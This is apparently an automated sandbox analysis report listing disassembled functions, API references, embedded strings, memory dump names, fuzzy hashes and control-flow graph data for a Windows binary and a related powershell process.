                                                                                                                                                                        Function 00BC35B9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        • 4V, xrefs: 00BC35FE
                                                                                                                                                                        • C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp, xrefs: 00BC35C3
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ActiveWindow
                                                                                                                                                                        • String ID: 4V$C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp
                                                                                                                                                                        • API String ID: 2558294473-3853628876
                                                                                                                                                                        • Opcode ID: d3ac0415b806dc3ca1b28083a1fa2f9bbaffbd773238507fc9dee7b653673020
                                                                                                                                                                        • Instruction ID: 951ad9b5262b566b581d9e1662c3ae185d038005dc37c23e514712e5a8496dee
                                                                                                                                                                        • Opcode Fuzzy Hash: d3ac0415b806dc3ca1b28083a1fa2f9bbaffbd773238507fc9dee7b653673020
                                                                                                                                                                        • Instruction Fuzzy Hash: 74115730D09298EFCF01DBE4C959B9DBBB4AF99304F9480ACD001AB285DBB45A08CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BC32DE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        • C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp, xrefs: 00BC32E0
                                                                                                                                                                        • 4V, xrefs: 00BC331D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ActiveWindow
                                                                                                                                                                        • String ID: 4V$C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp
                                                                                                                                                                        • API String ID: 2558294473-3853628876
                                                                                                                                                                        • Opcode ID: 458210b9d038c1a256fd321c21ed020191856c81e9d96140ea20fa6ab169245a
                                                                                                                                                                        • Instruction ID: 041ffb61a741efcdd2423b1f60e9745abbff78458be544bffc067d630afa9746
                                                                                                                                                                        • Opcode Fuzzy Hash: 458210b9d038c1a256fd321c21ed020191856c81e9d96140ea20fa6ab169245a
                                                                                                                                                                        • Instruction Fuzzy Hash: 62118B30905298DFCF01DBE4C954B9DBBF1AF95304F94809CD001AB286DBB14B08CB52
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BC364F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        • C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp, xrefs: 00BC3654
                                                                                                                                                                        • 4V, xrefs: 00BC3691
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ActiveWindow
                                                                                                                                                                        • String ID: 4V$C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp
                                                                                                                                                                        • API String ID: 2558294473-3853628876
                                                                                                                                                                        • Opcode ID: 48d6dcb8b33f12d2afb30c7063899d5828cf608c5925b97ce4afc54d3ba3c6ff
                                                                                                                                                                        • Instruction ID: 7eed0959d5706cf863443aba6280cd64e8fa8084159e4ba38ad87cfdc2118cfa
                                                                                                                                                                        • Opcode Fuzzy Hash: 48d6dcb8b33f12d2afb30c7063899d5828cf608c5925b97ce4afc54d3ba3c6ff
                                                                                                                                                                        • Instruction Fuzzy Hash: 3F118B30E05298EFCF01EBE4C958B9DBBF0AF55304FA480ADD001AB285DBB14B08DB51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD806F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetParent.USER32(0000000F), ref: 00BD80A2
                                                                                                                                                                        Strings
                                                                                                                                                                        • Unknown exception, xrefs: 00BD8077
                                                                                                                                                                        • C:\ReleaseAI\stubs\setup\controls\generic\VisualStyleBorder.h, xrefs: 00BD8087
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Parent
                                                                                                                                                                        • String ID: C:\ReleaseAI\stubs\setup\controls\generic\VisualStyleBorder.h$Unknown exception
                                                                                                                                                                        • API String ID: 975332729-9186675
                                                                                                                                                                        • Opcode ID: f816e2c0ed913bf9d6feae29663aa8b09d133512616536c083e412f370d0ff83
                                                                                                                                                                        • Instruction ID: dbd2cf79c7521115e6453cec814fa92db23e79603b481c5a3c24d803280060a0
                                                                                                                                                                        • Opcode Fuzzy Hash: f816e2c0ed913bf9d6feae29663aa8b09d133512616536c083e412f370d0ff83
                                                                                                                                                                        • Instruction Fuzzy Hash: 90016134D05298EFCF01EBE4C915ADDBFB0AF59300F148498D0417B296DBB55E48D791
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BC36E2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        • Unknown exception, xrefs: 00BC36EA
                                                                                                                                                                        • C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp, xrefs: 00BC36FD
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ActiveWindow
                                                                                                                                                                        • String ID: C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp$Unknown exception
                                                                                                                                                                        • API String ID: 2558294473-2631306498
                                                                                                                                                                        • Opcode ID: 7f827ac612f70fd899fe72d3d15581f399dc76d2747c9605e4b0e072af8dcaa9
                                                                                                                                                                        • Instruction ID: 058abf02df9ee9473186321554be11d43d0653e08313f4875e5471b3e0615338
                                                                                                                                                                        • Opcode Fuzzy Hash: 7f827ac612f70fd899fe72d3d15581f399dc76d2747c9605e4b0e072af8dcaa9
                                                                                                                                                                        • Instruction Fuzzy Hash: B9014C30E05298EFCB05EBE8C955BDDBBF0AF5A300F548498D0416B286DBB45B08D792
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BC336E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        • Unknown exception, xrefs: 00BC3376
                                                                                                                                                                        • C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp, xrefs: 00BC3386
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ActiveWindow
                                                                                                                                                                        • String ID: C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp$Unknown exception
                                                                                                                                                                        • API String ID: 2558294473-2631306498
                                                                                                                                                                        • Opcode ID: 38349204c15f8aa6a73427bb032f6c647b4b97cae290e6d89940f64a9230bcf4
                                                                                                                                                                        • Instruction ID: 937007657c2de637a3d39dad84b7820eceae22fd7ab7bddb2cec54ca4938ea64
                                                                                                                                                                        • Opcode Fuzzy Hash: 38349204c15f8aa6a73427bb032f6c647b4b97cae290e6d89940f64a9230bcf4
                                                                                                                                                                        • Instruction Fuzzy Hash: 6E012930D05298EBCB05EBE4C915BDDBBB0AF5A304F548498D0426B286DBB45A08D792
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D7F694 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BC9C30: InitializeCriticalSectionAndSpinCount.KERNEL32(00E97D50,00000000,1FC3D414,00BB0000,Function_001F7F70,000000FF,?,00D7F6C3,?,?,?,00BB7586), ref: 00BC9C55
                                                                                                                                                                          • Part of subcall function 00BC9C30: GetLastError.KERNEL32(?,00D7F6C3,?,?,?,00BB7586), ref: 00BC9C5F
                                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,00BB7586), ref: 00D7F6C7
                                                                                                                                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00BB7586), ref: 00D7F6D6
                                                                                                                                                                        Strings
                                                                                                                                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00D7F6D1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinString
                                                                                                                                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                        • API String ID: 450123788-631824599
                                                                                                                                                                        • Opcode ID: a91fb9ec149cc98b32ca84c3966af20fec542bf184f62604ead91c85830e5ef2
                                                                                                                                                                        • Instruction ID: 68d4aacc3072624f802e91234c7fa0b653627373c2d940ef08c85d06b8aae8ef
                                                                                                                                                                        • Opcode Fuzzy Hash: a91fb9ec149cc98b32ca84c3966af20fec542bf184f62604ead91c85830e5ef2
                                                                                                                                                                        • Instruction Fuzzy Hash: 10E06D712007418FD770AF25E914746BBE4AF14754F00886EE49AD2662EBB6D488CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:10.7%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                        Total number of Nodes:3
                                                                                                                                                                        Total number of Limit Nodes:0
                                                                                                                                                                        execution_graph 17099 befe70 17100 befef3 CreateActCtxA 17099->17100 17101 beff33 17100->17101

                                                                                                                                                                        Executed Functions

                                                                                                                                                                        Function 00BDC507 Relevance: 3.5, Strings: 2, Instructions: 1042COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 59 bdc507-bdc51d 61 bddb2b-bddc33 59->61 62 bdc523-bdc534 59->62 63 bdc539-bdc53c 61->63 140 bddc39-bddc3b 61->140 62->63 64 bdc536 62->64 65 bddc40-bddc78 63->65 66 bdc542 63->66 64->63 68 bddd5e-bddde3 65->68 69 bddc7e-bddd58 65->69 66->61 77 bddf4d-bddff6 68->77 78 bddde9-bddf47 68->78 69->68 87 bddffc-bde11d 77->87 88 bde123-bde1bb 77->88 78->77 87->88 90 bde23e-bde37a 88->90 91 bde1c1-bde239 88->91 94 bde380-bde430 90->94 91->94 100 bde62d-bde7b9 94->100 101 bde436-bde627 94->101 125 bde7bf-bde998 100->125 126 bde99e-bdea50 100->126 101->100 125->126 155 bdea7b-bdeb94 126->155 156 bdea52-bdea76 126->156 140->63 160 bdeb9a-bdec07 155->160 156->160 170 bdec3e-bded10 160->170 171 bdec09-bdec39 160->171 174 bded16-bded7e 170->174 171->174 176 bdeeeb-bdef62 174->176 177 bded84-bdeee5 174->177 190 bdef64-bdf000 176->190 191 bdef96-bdefce 176->191 177->176 196 bdf00a-bdf02b 190->196 191->196 197 bdf030-bdf038 196->197 197->63
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: $%k$&;MJ
                                                                                                                                                                        • API String ID: 0-902953960
                                                                                                                                                                        • Opcode ID: b1912ab638f5af6e613d0f5aae0a01412e0dbff8e9640961e8c1a91f3d2b0da1
                                                                                                                                                                        • Instruction ID: 96120ca3538c6915836b7a8d37d77d84d72489977d1d8c7b70618e1964211cad
                                                                                                                                                                        • Opcode Fuzzy Hash: b1912ab638f5af6e613d0f5aae0a01412e0dbff8e9640961e8c1a91f3d2b0da1
                                                                                                                                                                        • Instruction Fuzzy Hash: 56D285B4E116288FDBA5CF68CD80B99BBF5EB48211F1091EAE50DA7341DB319E81CF54
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BDBB08 Relevance: 1.6, Strings: 1, Instructions: 351COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 555 bdbb08-bdbb69 560 bdbb6b-bdbb7f 555->560 561 bdbba7-bdbbcc 555->561 564 bdbb88-bdbba5 560->564 565 bdbb81 560->565 570 bdc01d-bdc03f 561->570 571 bdbbd2-bdbc50 561->571 564->561 565->564 574 bdc04f 570->574 575 bdc041-bdc047 570->575 586 bdbc5a-bdbc65 571->586 577 bdc050 574->577 575->574 577->577 587 bdbc6f-bdbcac 586->587 589 bdbfef-bdc004 587->589 590 bdbcb2-bdbd11 587->590 589->570 599 bdbd2f-bdbd58 590->599 600 bdbd13-bdbd2d 590->600 607 bdbd6a-bdbd7f 599->607 608 bdbd5a-bdbd68 599->608 605 bdbd8a-bdbd99 600->605 610 bdbd9f-bdbe10 605->610 611 bdbfda-bdbfe9 605->611 614 bdbd88 607->614 608->614 610->611 623 bdbe16-bdbe35 610->623 611->589 611->590 614->605 626 bdbf9b-bdbfae 623->626 627 bdbe3b-bdbe6d 623->627 628 bdbfb5-bdbfb9 626->628 637 bdbfb0 627->637 638 bdbe73-bdbf95 627->638 630 bdbfc9-bdc017 628->630 631 bdbfbb-bdbfc1 628->631 630->570 630->571 631->630 637->628 638->626 638->627
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: \iY
                                                                                                                                                                        • API String ID: 0-3899780892
                                                                                                                                                                        • Opcode ID: 126cec562c253ab2706bd50cd6634973cb13a7234ed967f0c2df959d3e6b9527
                                                                                                                                                                        • Instruction ID: 9a0d70c8f7033544af47fcadc9113e69a3a746c7399b2e2a08143961cf83af88
                                                                                                                                                                        • Opcode Fuzzy Hash: 126cec562c253ab2706bd50cd6634973cb13a7234ed967f0c2df959d3e6b9527
                                                                                                                                                                        • Instruction Fuzzy Hash: 79C15334B102058BDB44EBB5D951A6EBBE7EFC4300F218429E816AB395EF359C46CBD1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BDBAF8 Relevance: 1.6, Strings: 1, Instructions: 311COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 674 bdbaf8-bdbb69 680 bdbb6b-bdbb7f 674->680 681 bdbba7-bdbbcc 674->681 684 bdbb88-bdbba5 680->684 685 bdbb81 680->685 690 bdc01d-bdc03f 681->690 691 bdbbd2-bdbc50 681->691 684->681 685->684 694 bdc04f 690->694 695 bdc041-bdc047 690->695 706 bdbc5a-bdbc65 691->706 697 bdc050 694->697 695->694 697->697 707 bdbc6f-bdbcac 706->707 709 bdbfef-bdc004 707->709 710 bdbcb2-bdbd11 707->710 709->690 719 bdbd2f-bdbd58 710->719 720 bdbd13-bdbd2d 710->720 727 bdbd6a-bdbd7f 719->727 728 bdbd5a-bdbd68 719->728 725 bdbd8a-bdbd99 720->725 730 bdbd9f-bdbe10 725->730 731 bdbfda-bdbfe9 725->731 734 bdbd88 727->734 728->734 730->731 743 bdbe16-bdbe35 730->743 731->709 731->710 734->725 746 bdbf9b-bdbfae 743->746 747 bdbe3b-bdbe6d 743->747 748 bdbfb5-bdbfb9 746->748 757 bdbfb0 747->757 758 bdbe73-bdbf95 747->758 750 bdbfc9-bdc017 748->750 751 bdbfbb-bdbfc1 748->751 750->690 750->691 751->750 757->748 758->746 758->747
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: \iY
                                                                                                                                                                        • API String ID: 0-3899780892
                                                                                                                                                                        • Opcode ID: 8499abc13362e083620b3fa3ae6bdb245f0787c0702a35fe6a2cfe2fdfb1723a
                                                                                                                                                                        • Instruction ID: 5ffc2710dc1ac21152d9a039cbd171494bf8ed1781aa2cd846debe87bd474a9c
                                                                                                                                                                        • Opcode Fuzzy Hash: 8499abc13362e083620b3fa3ae6bdb245f0787c0702a35fe6a2cfe2fdfb1723a
                                                                                                                                                                        • Instruction Fuzzy Hash: 4FB16634B102058FDB44EBB5D951A6E7BE7EFC4300B218529E81AAB394EF359C06CBD1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BDBB01 Relevance: 1.6, Strings: 1, Instructions: 309COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 779 bdbb01-bdbb69 785 bdbb6b-bdbb7f 779->785 786 bdbba7-bdbbcc 779->786 789 bdbb88-bdbba5 785->789 790 bdbb81 785->790 795 bdc01d-bdc03f 786->795 796 bdbbd2-bdbc50 786->796 789->786 790->789 799 bdc04f 795->799 800 bdc041-bdc047 795->800 811 bdbc5a-bdbc65 796->811 802 bdc050 799->802 800->799 802->802 812 bdbc6f-bdbcac 811->812 814 bdbfef-bdc004 812->814 815 bdbcb2-bdbd11 812->815 814->795 824 bdbd2f-bdbd58 815->824 825 bdbd13-bdbd2d 815->825 832 bdbd6a-bdbd7f 824->832 833 bdbd5a-bdbd68 824->833 830 bdbd8a-bdbd99 825->830 835 bdbd9f-bdbe10 830->835 836 bdbfda-bdbfe9 830->836 839 bdbd88 832->839 833->839 835->836 848 bdbe16-bdbe35 835->848 836->814 836->815 839->830 851 bdbf9b-bdbfae 848->851 852 bdbe3b-bdbe6d 848->852 853 bdbfb5-bdbfb9 851->853 862 bdbfb0 852->862 863 bdbe73-bdbf95 852->863 855 bdbfc9-bdc017 853->855 856 bdbfbb-bdbfc1 853->856 855->795 855->796 856->855 862->853 863->851 863->852
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: \iY
                                                                                                                                                                        • API String ID: 0-3899780892
                                                                                                                                                                        • Opcode ID: e4497aab7ffa5c0ac5b34879c4065d38480bd37b25b18e5d241b672571c823fd
                                                                                                                                                                        • Instruction ID: 385446973137df7251b44728d2820407f506b3b71ce86b9f1b1dcdc3a2c9b598
                                                                                                                                                                        • Opcode Fuzzy Hash: e4497aab7ffa5c0ac5b34879c4065d38480bd37b25b18e5d241b672571c823fd
                                                                                                                                                                        • Instruction Fuzzy Hash: 8FB15634B102059BDB44EBB5D951A6E7BE7EFC4300B218529E81AAB394DF359C06CBD1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BDC007 Relevance: 1.5, Strings: 1, Instructions: 263COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 884 bdc007-bdc00d 885 bdc015-bdc017 884->885 886 bdc01d-bdc03f 885->886 887 bdbbd2-bdbc50 885->887 890 bdc04f 886->890 891 bdc041-bdc047 886->891 902 bdbc5a-bdbc65 887->902 893 bdc050 890->893 891->890 893->893 903 bdbc6f-bdbcac 902->903 905 bdbfef-bdc004 903->905 906 bdbcb2-bdbd11 903->906 905->886 915 bdbd2f-bdbd58 906->915 916 bdbd13-bdbd2d 906->916 923 bdbd6a-bdbd7f 915->923 924 bdbd5a-bdbd68 915->924 921 bdbd8a-bdbd99 916->921 926 bdbd9f-bdbe10 921->926 927 bdbfda-bdbfe9 921->927 930 bdbd88 923->930 924->930 926->927 939 bdbe16-bdbe35 926->939 927->905 927->906 930->921 942 bdbf9b-bdbfae 939->942 943 bdbe3b-bdbe6d 939->943 944 bdbfb5-bdbfb9 942->944 951 bdbfb0 943->951 952 bdbe73-bdbf95 943->952 946 bdbfc9 944->946 947 bdbfbb-bdbfc1 944->947 946->884 947->946 951->944 952->942 952->943
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: \iY
                                                                                                                                                                        • API String ID: 0-3899780892
